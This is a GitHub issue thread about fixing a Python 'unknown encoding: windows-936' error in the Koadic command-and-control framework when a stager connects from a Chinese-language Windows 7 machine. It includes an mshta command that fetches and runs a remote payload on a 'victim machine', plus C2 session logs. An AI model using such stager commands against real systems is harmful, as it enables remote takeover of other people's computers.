### ISSUE TITLE
LookupError: unknown encoding: windows-936

### ISSUE THREAD

**Issue by Lunpopo** [zerosum0x0/koadic#92]
#### When i start run sta/js/mshta exploit command, get the backdoor url eg -> 
```
http://192.168.1.101:9999/FPPzK

And then type "mshta http://192.168.1.101:9999/FPPzK" command in Windows 7 victim machine.
```

#### Unfortunately, i got below error in Koadic program:
```
Exception happened during processing of request from ('192.168.1.102', 1051)
Traceback (most recent call last):
File "/usr/local/Cellar/python/3.7.2_2/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socketserver.py", line 650, in process_request_thread
self.finish_request(request, client_address)
File "/usr/local/Cellar/python/3.7.2_2/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socketserver.py", line 360, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/local/Cellar/python/3.7.2_2/Frameworks/Python.framework/Versions/3.7/lib/python3.7/socketserver.py", line 720, in init
self.handle()
File "/Users/popolun/Documents/koadic/core/handler.py", line 90, in handle
return BaseHTTPRequestHandler.handle(self)
File "/usr/local/Cellar/python/3.7.2_2/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/server.py", line 426, in handle
self.handle_one_request()
File "/usr/local/Cellar/python/3.7.2_2/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/server.py", line 414, in handle_one_request
method()
File "/Users/popolun/Documents/koadic/core/handler.py", line 183, in do_GET
return self.handle_stage()
File "/Users/popolun/Documents/koadic/core/handler.py", line 224, in handle_stage
data = self.post_process_script(self.options.get("STAGE"), template)
File "/Users/popolun/Documents/koadic/core/handler.py", line 515, in post_process_script
script = script.decode().encode("windows-"+encoder)
LookupError: unknown encoding: windows-936
[!] Zombie 0: Timed out.
```

### So, what should i do? thanks a lot.

**Comment by TheNaterz** [comment]
Open up 'core/handler.py', scroll down to line 515, replace "windows-" with "cp". Let me know if that works.

**Comment by Lunpopo** [comment]
> Open up 'core/handler.py', scroll down to line 515, replace "windows-" with "cp". Let me know if that works.

Awesome!!! It works well, but always throwing Error information, thank you very much!!!   look my shell output:
[+] Zombie 0: Staging new connection (192.168.1.102)
[!] parsing error
[!] LookupError('unknown encoding: windows-936')
[+] Zombie 0: posh0A\posh* @ POSH0A -- Windows 7 Professional

Can you solve this error information? Although it works well.  Thanks again!!!

**Comment by Lunpopo** [comment]
> Open up 'core/handler.py', scroll down to line 515, replace "windows-" with "cp". Let me know if that works.

There is a new question is that can`t display Chinese, My Windows 7 system language is Chinese.
Could you help me a little? Thank you so much.

**Comment by TheNaterz** [comment]
Alright cool, that confirms my suspicions. I just need to replace all those "windows-" encodings with "cp", (they should mean the same thing) and then add the correct entries to core/mappings.py. I can have something pushed out soonish.

**Comment by TheNaterz** [comment]
I just pushed a fix, but the session string won't display the Chinese characters correctly yet. Can you pull and run again with 'verbose on' when you get the chance? I need to know what the data looks like for you so I can make a fix.

**Comment by TheNaterz** [comment]
OK, I'm messing around with a Chinese Windows and there are a lot of weird quirks that aren't being taken into account and probably don't apply to other languages. It's still broken and I'll need to mess around with it more to figure out some good solutions.

**Comment by Lunpopo** [comment]
> I just pushed a fix, but the session string won't display the Chinese characters correctly yet (I think?). Can you pull and run again with 'verbose on' when you get the chance? I need to know what the data looks like for you so I can make a fix.

Yeah, its the session string won`t display Chinese characters correctly and often show lots of character encoding error. @TheNaterz

**Comment by Lunpopo** [comment]
> OK, I'm messing around with a Chinese Windows and there are a lot of weird quirks that aren't being taken into account and probably don't apply to other languages. It's still broken and I'll need to mess around with it more to figure out some good solutions.

Thanks again !!!

**Comment by Lunpopo** [comment]
> OK, I'm messing around with a Chinese Windows and there are a lot of weird quirks that aren't being taken into account and probably don't apply to other languages. It's still broken and I'll need to mess around with it more to figure out some good solutions.

@TheNaterz Excuse me, do you solve it?

**Comment by TheNaterz** [comment]
Pushed some more fixes. Most of the Chinese characters should be in core/mappings.py now, but let me know if you see anything else.

> There is a new question is that can`t display Chinese, My Windows 7 system language is Chinese.
> Could you help me a little? @TheNaterz Thank you so much!

My terminal and session strings were displaying Chinese characters just fine before I made any significant changes, so it's most likely not a Koadic issue. You'll have to make sure that your locale in your terminal is set to display Chinese characters correctly.
